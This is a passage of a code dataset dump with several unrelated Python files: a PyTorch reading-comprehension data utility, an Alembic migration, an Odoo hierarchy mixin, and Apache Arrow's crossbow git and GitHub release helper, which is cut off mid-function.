[self._pad(q_and_a,is_parag=False) for parag,q_and_a in texts]\n self.labels = labels\n\n if vocab is None:\n vocab = Vocabulary(['', '', '', '<0>', '<1>', '<2>', '<3>'])\n vocab.add_tokens(itertools.chain.from_iterable(self.parag))\n vocab.add_tokens(itertools.chain.from_iterable(self.q_and_a))\n\n if labels_vocab is None:\n labels_vocab = Vocabulary()\n labels_vocab.add_tokens(self.labels)\n\n self.vocab = vocab\n self.labels_vocab = labels_vocab\n\n def _pad(self, tokens, is_parag=True):\n \"\"\"\n Pad tokens to self.max_len\n Args:\n tokens (list): a list of str tokens for a given example\n\n Returns:\n list: a padded list of str tokens for a given example\n \"\"\"\n # pad the list of tokens to be exactly of the `max_len` size\n ### YOUR CODE BELOW ###\n if is_parag:\n max_len = self.parag_max_len\n else:\n max_len = self.q_and_a_max_len\n if len(tokens) >= max_len:\n tokens = tokens[:max_len]\n else:\n pad_num = max_len - len(tokens)\n tokens = tokens + pad_num * ['']\n ### YOUR CODE ABOVE ###\n return tokens\n\n def __getitem__(self, idx):\n \"\"\"\n Given an index, return a indexed dataset example\n\n Args:\n idx (int): dataset index\n\n Returns:\n tuple: a tuple of token_ids based on the vocabulary mapping and a corresponding label\n \"\"\"\n ### YOUR CODE BELOW ###\n parag, q_and_a = self.parag[idx], self.q_and_a[idx]\n parag_tokens = np.array([self.vocab[token] if token in self.vocab else self.vocab[''] for token in parag],\n dtype=np.int64)\n q_and_a_tokens = np.array([self.vocab[token] if token in self.vocab else self.vocab[''] for token in q_and_a],\n dtype=np.int64)\n label = self.labels[idx]\n label = self.labels_vocab[label]\n ### YOUR CODE ABOVE ###\n return parag_tokens, q_and_a_tokens, label\n\n def __len__(self):\n return len(self.parag)\n\n\ndef masked_softmax(logits, mask, dim=-1, log_softmax=False):\n \"\"\"Take the softmax of `logits` over given dimension, and set\n entries to 0 wherever `mask` is 0.\n Args:\n logits (torch.Tensor): Inputs to the softmax function.\n mask (torch.Tensor): Same shape as `logits`, with 0 indicating\n positions that should be assigned 0 probability in the output.\n dim (int): Dimension over which to take softmax.\n log_softmax (bool): Take log-softmax rather than regular softmax.\n E.g., some PyTorch functions such as `F.nll_loss` expect log-softmax.\n Returns:\n probs (torch.Tensor): Result of taking masked softmax over the logits.\n \"\"\"\n mask = mask.type(torch.float32)\n masked_logits = mask * logits + (1 - mask) * -1e30\n softmax_fn = F.log_softmax if log_softmax else F.softmax\n probs = softmax_fn(masked_logits, dim)\n\n return probs\n\ndef torch_from_json(path, dtype=torch.float32):\n \"\"\"Load a PyTorch Tensor from a JSON file.\n Args:\n path (str): Path to the JSON file to load.\n dtype (torch.dtype): Data type of loaded array.\n Returns:\n tensor (torch.Tensor): Tensor loaded from JSON file.\n \"\"\"\n with open(path, 'r',encoding=\"utf8\") as fh:\n array = np.array(json.load(fh))\n\n tensor = torch.from_numpy(array).type(dtype)\n\n return tensor\n\n\ndef get_dataset_quail():\n \"\"\"\n The structure of quAIL training dataset:\n\n {'version': ,\n 'data':\n 'u001':\n 'author': \n 'title': \n 'context': \n 'questions':\n 'u001_0':\n 'question': \n 'answers':\n '0': \n '1': \n '2': \n '3': }\n \"\"\"\n train_processed_data_file_name = 'train_processed_data.txt'\n dev_processed_data_file_name = 'dev_processed_data.txt'\n\n # create stitched data if they do not exist.\n f_list = os.listdir()\n if train_processed_data_file_name not in f_list:\n questions_file_name = './data/quAIL/train_questions.json'\n key_file_name = './data/quAIL/train_key.json'\n process_data_quail(questions_file_name, key_file_name, train_processed_data_file_name)\n if dev_processed_data_file_name not in f_list:\n questions_file_name = './data/quAIL/dev_questions.json'\n key_file_name = './data/quAIL/new_dev_key.json'\n process_data_quail(questions_file_name, key_file_name, dev_processed_data_file_name)\n\n # load stitched data\n with open(train_processed_data_file_name, 'rb') as f:\n train_data = pickle.load(f)\n with open(dev_processed_data_file_name, 'rb') as f:\n dev_data = pickle.load(f)\n\n parag_length_list = [len(example[0]) for example, label in train_data]\n max_parag_length = max(parag_length_list)\n q_and_a_length_list = [len(example[1]) for example, label in train_data]\n max_q_and_a_length = max(q_and_a_length_list)\n print(\"guagua\", max_parag_length, max_q_and_a_length)\n\n train_texts = [example for example, label in train_data]\n train_labels = [label for quiz, label in train_data]\n dev_texts = [quiz for quiz, label in dev_data]\n dev_labels = [label for quiz, label in dev_data]\n\n # build standard Pytorch Dataset object of our data\n dataset_train = QADataset(train_texts, train_labels, parag_max_len=max_parag_length,\n q_and_a_max_len=max_q_and_a_length)\n dataset_dev = QADataset(dev_texts, dev_labels, vocab=dataset_train.vocab, labels_vocab=dataset_train.labels_vocab,\n parag_max_len=max_parag_length, q_and_a_max_len=max_q_and_a_length)\n\n return dataset_train, dataset_dev\n\ndef get_dataset_race():\n train_path = './data/RACE/train/'\n dev_path = './data/RACE/dev/'\n train_processed_data_file_name = 'train_processed_data_race.txt'\n dev_processed_data_file_name = 'dev_processed_data_race.txt'\n f_list = os.listdir()\n if train_processed_data_file_name not in f_list:\n process_data_race(train_path, train_processed_data_file_name)\n if dev_processed_data_file_name not in f_list:\n process_data_race(dev_path, dev_processed_data_file_name)\n # load stitched data\n with open(train_processed_data_file_name, 'rb') as f:\n train_data = pickle.load(f)\n with open(dev_processed_data_file_name, 'rb') as f:\n dev_data = pickle.load(f)\n parag_length_list = [len(example[0]) for example, label in train_data]\n max_parag_length = max(parag_length_list)\n q_and_a_length_list = [len(example[1]) for example, label in train_data]\n max_q_and_a_length = max(q_and_a_length_list)\n print(\"guagua\",max_parag_length,max_q_and_a_length)\n\n train_texts = [example for example, label in train_data]\n train_labels = [label for quiz, label in train_data]\n dev_texts = [quiz for quiz, label in dev_data]\n dev_labels = [label for quiz, label in dev_data]\n\n # build standard Pytorch Dataset object of our data\n dataset_train = QADataset(train_texts, train_labels, parag_max_len=max_parag_length,\n q_and_a_max_len=max_q_and_a_length)\n dataset_dev = QADataset(dev_texts, dev_labels, vocab=dataset_train.vocab, labels_vocab=dataset_train.labels_vocab,\n parag_max_len=max_parag_length, q_and_a_max_len=max_q_and_a_length)\n return dataset_train, dataset_dev\n\ndef get_dataset_race_and_quail():\n # this function is used for data augmentation\n train_processed_data_file_name_race = 'train_processed_data_race.txt'\n f_list = os.listdir()\n with open(train_processed_data_file_name_race, 'rb') as f:\n train_data_race = pickle.load(f)\n\n train_processed_data_file_name_quail = 'train_processed_data.txt'\n f_list = os.listdir()\n with open(train_processed_data_file_name_quail, 'rb') as f:\n train_data_quail = pickle.load(f)\n\n dev_processed_data_file_name_quail = 'dev_processed_data.txt'\n with open(dev_processed_data_file_name_quail, 'rb') as f:\n dev_data_quail = pickle.load(f)\n\n parag_length_list = [len(example[0]) for example, label in train_data_race]\n max_parag_length_race = max(parag_length_list)\n parag_length_list = [len(example[0]) for example, label in train_data_quail]\n max_parag_length_quail = max(parag_length_list)\n max_parag_length = max(max_parag_length_race, max_parag_length_quail)\n\n q_and_a_length_list_race = [len(example[1]) for example, label in train_data_race]\n max_q_and_a_length_race = max(q_and_a_length_list_race)\n q_and_a_length_list_quail = [len(example[1]) for example, label in train_data_quail]\n max_q_and_a_length_quail = max(q_and_a_length_list_quail)\n max_q_and_a_length = max(max_q_and_a_length_race, max_q_and_a_length_quail)\n\n print(\"max paragraph length and max q_and_a length: \",max_parag_length,max_q_and_a_length)\n\n train_texts = [example for example, label in train_data_race] + [example for example, label in train_data_quail]\n train_labels = [label for quiz, label in train_data_race] + [label for quiz, label in train_data_quail]\n dev_texts = [quiz for quiz, label in dev_data_quail]\n dev_labels = [label for quiz, label in dev_data_quail]\n\n # build standard Pytorch Dataset object of our data\n dataset_train = QADataset(train_texts, train_labels, parag_max_len=max_parag_length,\n q_and_a_max_len=max_q_and_a_length)\n dataset_dev = QADataset(dev_texts, dev_labels, vocab=dataset_train.vocab, labels_vocab=dataset_train.labels_vocab,\n parag_max_len=max_parag_length, q_and_a_max_len=max_q_and_a_length)\n return dataset_train, dataset_dev\n\nclass EMA:\n \"\"\"Exponential moving average of model parameters.\n Args:\n model (torch.nn.Module): Model with parameters whose EMA will be kept.\n decay (float): Decay rate for exponential moving average.\n \"\"\"\n def __init__(self, model, decay):\n self.decay = decay\n self.shadow = {}\n self.original = {}\n\n # Register model parameters\n for name, param in model.named_parameters():\n if param.requires_grad:\n self.shadow[name] = param.data.clone()\n\n def __call__(self, model, num_updates):\n decay = min(self.decay, (1.0 + num_updates) / (10.0 + num_updates))\n for name, param in model.named_parameters():\n if param.requires_grad:\n assert name in self.shadow\n new_average = \\\n (1.0 - decay) * param.data + decay * self.shadow[name]\n self.shadow[name] = new_average.clone()\n\n def assign(self, model):\n \"\"\"Assign exponential moving average of parameter values to the\n respective parameters.\n Args:\n model (torch.nn.Module): Model to assign parameter values.\n \"\"\"\n for name, param in model.named_parameters():\n if param.requires_grad:\n assert name in self.shadow\n self.original[name] = param.data.clone()\n param.data = self.shadow[name]\n\n def resume(self, model):\n \"\"\"Restore original parameters to a model. That is, put back\n the values that were in each parameter at the last call to `assign`.\n Args:\n model (torch.nn.Module): Model to assign parameter values.\n \"\"\"\n for name, param in model.named_parameters():\n if param.requires_grad:\n assert name in self.shadow\n param.data = self.original[name]\n\n\ndef load_model(model, checkpoint_path, device, return_step=True):\n \"\"\"Load model parameters from disk.\n Args:\n model (torch.nn.DataParallel): Load parameters into this model.\n checkpoint_path (str): Path to checkpoint to load.\n gpu_ids (list): GPU IDs for DataParallel.\n return_step (bool): Also return the step at which checkpoint was saved.\n Returns:\n model (torch.nn.DataParallel): Model loaded from checkpoint.\n step (int): Step at which checkpoint was saved. Only if `return_step`.\n \"\"\"\n ckpt_dict = torch.load(checkpoint_path, map_location=device)\n\n # Build model, load parameters\n model.load_state_dict(ckpt_dict)\n\n # if return_step:\n # step = ckpt_dict['step']\n # return model, step\n\n return model","repo_name":"Mikemraz/QAsystem-quAIL","sub_path":"utils/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":21420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"32163208826","text":"\"\"\"empty message\n\nRevision ID: d46e7ff1b1f2\nRevises: \nCreate Date: 2021-08-04 17:33:51.191722\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd46e7ff1b1f2'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('NFL', sa.Column('team_name', sa.VARCHAR(length=30), nullable=True))\n op.drop_column('NFL', 'name')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('NFL', sa.Column('name', sa.VARCHAR(length=30), autoincrement=False, nullable=True))\n op.drop_column('NFL', 'team_name')\n # ### end Alembic commands ###\n","repo_name":"jasole1983/yourwildestfantasy","sub_path":"xtra/migrations/versions/d46e7ff1b1f2_.py","file_name":"d46e7ff1b1f2_.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"33934304827","text":"import functools\nimport json\nimport operator\n\nfrom odoo import api, fields, models\nfrom odoo.osv import expression\n\n\nclass Hierarchy(models.AbstractModel):\n\n _name = \"muk_utils.mixins.hierarchy\"\n _description = \"Hierarchy Mixin\"\n\n _parent_store = True\n _parent_path_sudo = False\n _parent_path_store = False\n\n _name_path_context = \"show_path\"\n\n # ----------------------------------------------------------\n # Database\n # ----------------------------------------------------------\n\n parent_path = fields.Char(string=\"Parent Path\", index=True)\n parent_path_names = fields.Char(\n _module=lambda self: self._module,\n compute=\"_compute_parent_paths\",\n compute_sudo=False,\n store=lambda self: self._parent_path_store,\n search=\"_search_parent_path_names\",\n string=\"Path Names\",\n readonly=True,\n automatic=True,\n )\n parent_path_json = fields.Text(\n _module=lambda self: self._module,\n compute=\"_compute_parent_paths\",\n compute_sudo=False,\n store=lambda self: self._parent_path_store,\n string=\"Path Json\",\n readonly=True,\n automatic=True,\n )\n\n\n # ----------------------------------------------------------\n # Helper\n # ----------------------------------------------------------\n\n @api.model\n def _get_depends_parent_paths(self):\n depends = [\"parent_path\"]\n if self._rec_name:\n depends += [self._rec_name]\n elif \"name\" in self._fields:\n depends += [\"name\"]\n elif \"x_name\" in self._fields:\n depends += [\"x_name\"]\n return depends\n\n # ----------------------------------------------------------\n # Search\n # ----------------------------------------------------------\n\n @api.model\n def _search_parent_path_names(self, operator, operand):\n domain = []\n for value in operand.split(\"/\"):\n args = [(self._rec_name_fallback(), operator, value)]\n domain = expression.OR([args, domain]) if domain else args\n return domain if domain else [(self._rec_name_fallback(), operator, \"\")]\n\n # ----------------------------------------------------------\n # Read, View\n # ----------------------------------------------------------\n\n @api.depends(lambda self: self._get_depends_parent_paths())\n def _compute_parent_paths(self):\n records = self.filtered(\"parent_path\")\n records_without_parent_path = self - records\n paths = [list(map(int, rec.parent_path.split(\"/\")[:-1])) for rec in records]\n ids = paths and set(functools.reduce(operator.concat, paths)) or []\n model_without_path = self.with_context(**{self._name_path_context: False})\n filtered_records = model_without_path.browse(ids)._filter_access(\"read\")\n data = dict(filtered_records.name_get())\n for record in records:\n path_names = [\"\"]\n path_json = []\n for id in reversed(list(map(int, record.parent_path.split(\"/\")[:-1]))):\n if id not in data:\n break\n path_names.append(data[id])\n path_json.append({\"model\": record._name, \"name\": data[id], \"id\": id})\n path_names.reverse()\n path_json.reverse()\n record.update(\n {\n \"parent_path_names\": \"/\".join(path_names),\n \"parent_path_json\": json.dumps(path_json),\n }\n )\n records_without_parent_path.update(\n {\"parent_path_names\": False, \"parent_path_json\": False}\n )\n\n @api.model\n def _name_search(\n self, name=\"\", args=None, operator=\"ilike\", limit=100, name_get_uid=None\n ):\n domain = list(args or [])\n if not (name == \"\" and operator == \"ilike\"):\n if \"/\" in name:\n domain += [(\"parent_path_names\", operator, name)]\n else:\n domain += [(self._rec_name, operator, name)]\n records = self.browse(\n self._search(domain, limit=limit, access_rights_uid=name_get_uid)\n )\n return models.lazy_name_get(records.with_user(name_get_uid or self.env.uid))\n\n def name_get(self):\n if self.env.context.get(self._name_path_context):\n res = []\n for record in self:\n names = record.parent_path_names\n if not names:\n res.append(super(Hierarchy, record).name_get()[0])\n elif not len(names) > 50:\n res.append((record.id, names))\n else:\n res.append((record.id, \"..\" + names[-48:]))\n return res\n return super(Hierarchy, self).name_get()\n\n # ----------------------------------------------------------\n # Create, Update, Delete\n # ----------------------------------------------------------\n\n def write(self, vals):\n res = super(Hierarchy, self).write(vals)\n if self._parent_path_store and self._rec_name_fallback() in vals:\n domain = [(\"id\", \"child_of\", self.ids)]\n records = self.sudo().search(domain)\n records.modified([\"parent_path\"])\n return res\n\n","repo_name":"PricePaper/odoo-custom-v15","sub_path":"muk_utils/models/mixins_hierarchy.py","file_name":"mixins_hierarchy.py","file_ext":"py","file_size_in_byte":5228,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"29"} +{"seq_id":"12377330857","text":"import os\nimport re\nimport fnmatch\nimport glob\nimport time\nimport logging\nimport mimetypes\nimport subprocess\nimport textwrap\nimport uuid\nfrom io import StringIO\nfrom pathlib import Path\nfrom datetime import date\nimport warnings\n\nimport jinja2\nfrom ruamel.yaml import YAML\n\ntry:\n import github3\n _have_github3 = True\nexcept ImportError:\n github3 = object\n _have_github3 = False\n\ntry:\n import pygit2\nexcept ImportError:\n PygitRemoteCallbacks = object\n GitError = Exception\nelse:\n PygitRemoteCallbacks = pygit2.RemoteCallbacks\n GitError = pygit2.GitError\n\nfrom ..utils.source import ArrowSources\n\n\nfor pkg in [\"requests\", \"urllib3\", \"github3\"]:\n logging.getLogger(pkg).setLevel(logging.WARNING)\n\nlogger = logging.getLogger(\"crossbow\")\n\n\nclass CrossbowError(Exception):\n pass\n\n\ndef _flatten(mapping):\n \"\"\"Converts a hierarchical mapping to a flat dictionary\"\"\"\n result = {}\n for k, v in mapping.items():\n if isinstance(v, dict):\n for ik, iv in _flatten(v).items():\n ik = ik if isinstance(ik, tuple) else (ik,)\n result[(k,) + ik] = iv\n elif isinstance(v, list):\n for ik, iv in enumerate(_flatten(v)):\n ik = ik if isinstance(ik, tuple) else (ik,)\n result[(k,) + ik] = iv\n else:\n result[(k,)] = v\n return result\n\n\ndef _unflatten(mapping):\n \"\"\"Converts a flat tuple => object mapping to hierarchical one\"\"\"\n result = {}\n for path, value in mapping.items():\n parents, leaf = path[:-1], path[-1]\n # create the hierarchy until we reach the leaf value\n temp = result\n for parent in parents:\n temp.setdefault(parent, {})\n temp = temp[parent]\n # set the leaf value\n temp[leaf] = value\n\n return result\n\n\ndef _unflatten_tree(files):\n \"\"\"Converts a flat path => object mapping to a hierarchical directories\n\n Input:\n {\n 'path/to/file.a': a_content,\n 'path/to/file.b': b_content,\n 'path/file.c': c_content\n }\n Output:\n {\n 'path': {\n 'to': {\n 'file.a': a_content,\n 'file.b': b_content\n },\n 'file.c': c_content\n }\n }\n \"\"\"\n files = {tuple(k.split('/')): v for k, v in files.items()}\n return _unflatten(files)\n\n\ndef _render_jinja_template(searchpath, template, params):\n def format_all(items, pattern):\n return [pattern.format(item) for item in items]\n\n loader = jinja2.FileSystemLoader(searchpath)\n env = jinja2.Environment(loader=loader, trim_blocks=True,\n lstrip_blocks=True,\n undefined=jinja2.StrictUndefined)\n env.filters['format_all'] = format_all\n template = env.get_template(template)\n return template.render(**params)\n\n\n# configurations for setting up branch skipping\n# - appveyor has a feature to skip builds without an appveyor.yml\n# - travis reads from the default branch and applies the rules\n# - circle requires the configuration to be present on all branch, even ones\n# that are configured to be skipped\n# - azure skips branches without azure-pipelines.yml by default\n# - github skips branches without .github/workflows/ by default\n\n_default_travis_yml = \"\"\"\nbranches:\n only:\n - master\n - /.*-travis-.*/\n\nos: linux\ndist: trusty\nlanguage: generic\n\"\"\"\n\n_default_circle_yml = \"\"\"\nversion: 2\n\njobs:\n build:\n machine: true\n\nworkflows:\n version: 2\n build:\n jobs:\n - build:\n filters:\n branches:\n only:\n - /.*-circle-.*/\n\"\"\"\n\n_default_tree = {\n '.travis.yml': _default_travis_yml,\n '.circleci/config.yml': _default_circle_yml\n}\n\n\nclass GitRemoteCallbacks(PygitRemoteCallbacks):\n\n def __init__(self, token):\n self.token = token\n self.attempts = 0\n super().__init__()\n\n def push_update_reference(self, refname, message):\n pass\n\n def update_tips(self, refname, old, new):\n pass\n\n def credentials(self, url, username_from_url, allowed_types):\n # its a libgit2 bug, that it infinitely retries the authentication\n self.attempts += 1\n\n if self.attempts >= 5:\n # pygit2 doesn't propagate the exception properly\n msg = 'Wrong oauth personal access token'\n print(msg)\n raise CrossbowError(msg)\n\n if (allowed_types &\n pygit2.credentials.GIT_CREDENTIAL_USERPASS_PLAINTEXT):\n return pygit2.UserPass('x-oauth-basic', self.token)\n else:\n return None\n\n\ndef _git_ssh_to_https(url):\n return url.replace('git@github.com:', 'https://github.com/')\n\n\ndef _parse_github_user_repo(remote_url):\n # TODO: use a proper URL parser instead?\n m = re.match(r'.*\\/([^\\/]+)\\/([^\\/\\.]+)(\\.git|/)?$', remote_url)\n if m is None:\n # Perhaps it's simply \"username/reponame\"?\n m = re.match(r'^(\\w+)/(\\w+)$', remote_url)\n if m is None:\n raise CrossbowError(\n f\"Unable to parse the github owner and repository from the \"\n f\"repository's remote url {remote_url!r}\"\n )\n user, repo = m.group(1), m.group(2)\n return user, repo\n\n\nclass Repo:\n \"\"\"\n Base class for interaction with local git repositories\n\n A high level wrapper used for both reading revision information from\n arrow's repository and pushing continuous integration tasks to the queue\n repository.\n\n Parameters\n ----------\n require_https : boolean, default False\n Raise exception for SSH origin URLs\n \"\"\"\n\n def __init__(self, path, github_token=None, remote_url=None,\n require_https=False):\n self.path = Path(path)\n self.github_token = github_token\n self.require_https = require_https\n self._remote_url = remote_url\n self._pygit_repo = None\n self._github_repo = None # set by as_github_repo()\n self._updated_refs = []\n\n def __str__(self):\n tpl = textwrap.dedent('''\n Repo: {remote}@{branch}\n Commit: {head}\n ''')\n return tpl.format(\n remote=self.remote_url,\n branch=self.branch.branch_name,\n head=self.head\n )\n\n @property\n def repo(self):\n if self._pygit_repo is None:\n self._pygit_repo = pygit2.Repository(str(self.path))\n return self._pygit_repo\n\n @property\n def origin(self):\n remote = self.repo.remotes['origin']\n if self.require_https and remote.url.startswith('git@github.com'):\n raise CrossbowError(\"Change SSH origin URL to HTTPS to use \"\n \"Crossbow: {}\".format(remote.url))\n return remote\n\n def fetch(self, retry=3):\n refspec = '+refs/heads/*:refs/remotes/origin/*'\n attempt = 1\n while True:\n try:\n self.origin.fetch([refspec])\n break\n except GitError as e:\n if retry and attempt < retry:\n attempt += 1\n else:\n raise e\n\n def push(self, refs=None, github_token=None):\n github_token = github_token or self.github_token\n if github_token is None:\n raise RuntimeError(\n 'Could not determine GitHub token. Please set the '\n 'CROSSBOW_GITHUB_TOKEN environment variable to a '\n 'valid GitHub access token or pass one to --github-token.'\n )\n callbacks = GitRemoteCallbacks(github_token)\n refs = refs or []\n try:\n self.origin.push(refs + self._updated_refs, callbacks=callbacks)\n except pygit2.GitError:\n raise RuntimeError('Failed to push updated references, '\n 'potentially because of credential issues: {}'\n .format(self._updated_refs))\n else:\n self.updated_refs = []\n\n @property\n def head(self):\n \"\"\"Currently checked out commit's sha\"\"\"\n return self.repo.head\n\n @property\n def branch(self):\n \"\"\"Currently checked out branch\"\"\"\n try:\n return self.repo.branches[self.repo.head.shorthand]\n except KeyError:\n raise CrossbowError(\n 'Cannot determine the current branch of the Arrow repository '\n 'to clone or push to, perhaps it is in detached HEAD state. '\n 'Please checkout a branch.'\n )\n\n @property\n def remote(self):\n \"\"\"Currently checked out branch's remote counterpart\"\"\"\n try:\n return self.repo.remotes[self.branch.upstream.remote_name]\n except (AttributeError, KeyError):\n raise CrossbowError(\n 'Cannot determine git remote for the Arrow repository to '\n 'clone or push to, try to push the `{}` branch first to have '\n 'a remote tracking counterpart.'.format(self.branch.name)\n )\n\n @property\n def remote_url(self):\n \"\"\"Currently checked out branch's remote counterpart URL\n\n If an SSH github url is set, it will be replaced by the https\n equivalent usable with GitHub OAuth token.\n \"\"\"\n return self._remote_url or _git_ssh_to_https(self.remote.url)\n\n @property\n def user_name(self):\n try:\n return next(self.repo.config.get_multivar('user.name'))\n except StopIteration:\n return os.environ.get('GIT_COMMITTER_NAME', 'unknown')\n\n @property\n def user_email(self):\n try:\n return next(self.repo.config.get_multivar('user.email'))\n except StopIteration:\n return os.environ.get('GIT_COMMITTER_EMAIL', 'unknown')\n\n @property\n def signature(self):\n return pygit2.Signature(self.user_name, self.user_email,\n int(time.time()))\n\n @property\n def default_branch_name(self):\n default_branch_name = os.getenv(\"ARCHERY_DEFAULT_BRANCH\")\n\n if default_branch_name is None:\n try:\n ref_obj = self.repo.references[\"refs/remotes/origin/HEAD\"]\n target_name = ref_obj.target\n target_name_tokenized = target_name.split(\"/\")\n default_branch_name = target_name_tokenized[-1]\n except KeyError:\n default_branch_name = \"main\"\n warnings.warn('Unable to determine default branch name: '\n 'ARCHERY_DEFAULT_BRANCH environment variable is '\n 'not set. Git repository does not contain a '\n '\\'refs/remotes/origin/HEAD\\'reference. Setting '\n 'the default branch name to ' +\n default_branch_name, RuntimeWarning)\n\n return default_branch_name\n\n def create_tree(self, files):\n builder = self.repo.TreeBuilder()\n\n for filename, content in files.items():\n if isinstance(content, dict):\n # create a subtree\n tree_id = self.create_tree(content)\n builder.insert(filename, tree_id, pygit2.GIT_FILEMODE_TREE)\n else:\n # create a file\n blob_id = self.repo.create_blob(content)\n builder.insert(filename, blob_id, pygit2.GIT_FILEMODE_BLOB)\n\n tree_id = builder.write()\n return tree_id\n\n def create_commit(self, files, parents=None, message='',\n reference_name=None):\n if parents is None:\n # by default use the main branch as the base of the new branch\n # required to reuse github actions cache across crossbow tasks\n commit, _ = self.repo.resolve_refish(self.default_branch_name)\n parents = [commit.id]\n tree_id = self.create_tree(files)\n\n author = committer = self.signature\n commit_id = self.repo.create_commit(reference_name, author, committer,\n message, tree_id, parents)\n return self.repo[commit_id]\n\n def create_branch(self, branch_name, files, parents=None, message='',\n signature=None):\n # create commit with the passed tree\n commit = self.create_commit(files, parents=parents, message=message)\n\n # create branch pointing to the previously created commit\n branch = self.repo.create_branch(branch_name, commit)\n\n # append to the pushable references\n self._updated_refs.append('refs/heads/{}'.format(branch_name))\n\n return branch\n\n def create_tag(self, tag_name, commit_id, message=''):\n tag_id = self.repo.create_tag(tag_name, commit_id,\n pygit2.GIT_OBJ_COMMIT, self.signature,\n message)\n\n # append to the pushable references\n self._updated_refs.append('refs/tags/{}'.format(tag_name))\n\n return self.repo[tag_id]\n\n def file_contents(self, commit_id, file):\n commit = self.repo[commit_id]\n entry = commit.tree[file]\n blob = self.repo[entry.id]\n return blob.data\n\n def _github_login(self, github_token):\n \"\"\"Returns a logged in github3.GitHub instance\"\"\"\n if not _have_github3:\n raise ImportError('Must install github3.py')\n github_token = github_token or self.github_token\n session = github3.session.GitHubSession(\n default_connect_timeout=10,\n default_read_timeout=30\n )\n github = github3.GitHub(session=session)\n github.login(token=github_token)\n return github\n\n def as_github_repo(self, github_token=None):\n \"\"\"Converts it to a repository object which wraps the GitHub API\"\"\"\n if self._github_repo is None:\n github = self._github_login(github_token)\n username, reponame = _parse_github_user_repo(self.remote_url)\n self._github_repo = github.repository(username, reponame)\n return self._github_repo\n\n def token_expiration_date(self, github_token=None):\n \"\"\"Returns the expiration date for the github_token provided\"\"\"\n github = self._github_login(github_token)\n # github3 hides the headers from us. Use the _get method\n # to access the response headers.\n resp = github._get(github.session.base_url)\n # Response in the form '2023-01-23 10:40:28 UTC'\n date_string = resp.headers.get(\n 'github-authentication-token-expiration')\n if date_string:\n return date.fromisoformat(date_string.split()[0])\n\n def github_commit(self, sha):\n repo = self.as_github_repo()\n return repo.commit(sha)\n\n def github_release(self, tag):\n repo = self.as_github_repo()\n try:\n return repo.release_from_tag(tag)\n except github3.exceptions.NotFoundError:\n return None\n\n def github_upload_asset_requests(self, release, path, name, mime,\n max_retries=None, retry_backoff=None):\n if max_retries is None:\n max_retries = int(os.environ.get('CROSSBOW_MAX_RETRIES', 8))\n if retry_backoff is None:\n retry_backoff = int(os.environ.get('CROSSBOW_RETRY_BACKOFF', 5))\n\n for i in range(max_retries):\n try:\n with open(path, 'rb') as fp:\n result = release.upload_asset(name=name, asset=fp,\n content_type=mime)\n except github3.exceptions.ResponseError as e:\n logger.error('Attempt {} has failed with message: {}.'\n .format(i + 1, str(e)))\n logger.error('Error message {}'.format(e.msg))\n logger.error('List of errors provided by GitHub:')\n for err in e.errors:\n logger.error(' - {}'.format(err))\n\n if e.code == 422:\n # 422 Validation Failed, probably raised because\n # ReleaseAsset already exists, so try to remove it before\n # reattempting the asset upload\n for asset in release.assets():\n if asset.name == name:\n logger.info('Release asset {} already exists, '\n 'removing it...'.format(name))\n asset.delete()\n logger.info('Asset {} removed.'.format(name))\n break\n except github3.exceptions.ConnectionError as e:\n logger.error('Attempt {} has failed with message: {}.'\n .format(i + 1, str(e)))\n else:\n logger.info('Attempt {} has finished.'.format(i + 1))\n return result\n\n time.sleep(retry_backoff)\n\n raise RuntimeError('GitHub asset uploading has failed!')\n\n def github_upload_asset_curl(self, release, path, name, mime):\n upload_url, _ = release.upload_url.split('{?')\n upload_url += '?name={}'.format(name)\n\n command = [\n 'curl',\n '--fail',\n '-H', \"Authorization: token {}\".format(self.github_token),\n '-H', \"Content-Type: {}\".format(mime),\n '--data-binary', '@{}'.format(path),\n upload_url\n ]\n return subprocess.run(command, shell=False, check=True)\n\n def github_overwrite_release_assets(self, tag_name, target_commitish,\n patterns, method='requests'):\n # Since github has changed something the asset uploading via requests\n # got instable, so prefer the cURL alternative.\n # Potential cause:\n # sigmavirus24/github3.py/issues/779#issuecomment-379470626\n repo = self.as_github_repo()\n if not tag_name:\n raise CrossbowError('Empty tag name')\n if not target_commitish:\n raise CrossbowError('Empty target commit for the release tag')\n\n # remove the whole release if it already exists\n try:\n release = repo.release_from_tag(tag_name)\n except github3.exceptions.NotFoundError:\n pass\n else:\n release.delete()\n\n release = repo.create_release(tag_name, target_commitish)\n for pattern in patterns:\n for path in glob.glob(pattern, recursive=True):\n name = os.path.basename(path)\n size = os.path.getsize(path)\n mime = mimetypes.guess_type(name)[0] or 'application/zip'\n\n logger.info(\n 'Uploading asset `{}` with mimetype {} and size {}...'\n .format(name, mime, size)\n )\n\n if method == 'requests':\n self.github_upload_asset_requests(release, path, name=name,\n mime=mime)\n elif method == 'curl':\n self.github_upload_asset_curl(release, path, name=name,\n mime=mime)\n else:\n raise CrossbowError(\n 'Unsupported upload method {}'.format(method)\n )\n\n def github_pr(self, title, head=None, base=None, body=None,\n github_token=None, create=False):\n if create:\n # Default value for base is the default_branch_name\n base = self.default_branch_name if base is None else base\n github_token = github_token or self.github_token\n repo = self.as_github_repo(github_token=github_token)\n if create:\n return repo.create_pull(title=title, base=base, head=head,\n body=body)\n else:\n # Retrieve open PR for base and head.\n # There should be a single open one with that title.\n for pull in repo.pull_requests(state=\"open\", head=head,\n base=base):\n if title in pull.title:\n return pull\n raise CrossbowError(\n f\"Pull request with Title: {title!r} not found \"\n f\"in repository {repo.full_name!r}\"\n )\n\n\nclass Queue(Repo):\n\n def _latest_prefix_id(self, prefix):\n pattern = re.compile(r'[\\w\\/-]*{}-(\\d+)'.format(prefix))\n matches = list(filter(None, map(pattern.match, self.repo.branches)))\n if matches:\n latest = max(int(m.group(1)) for m in matches)\n else:\n latest = -1\n return latest\n\n def _prefix_contains_date(self, prefix):\n prefix_date_pattern = 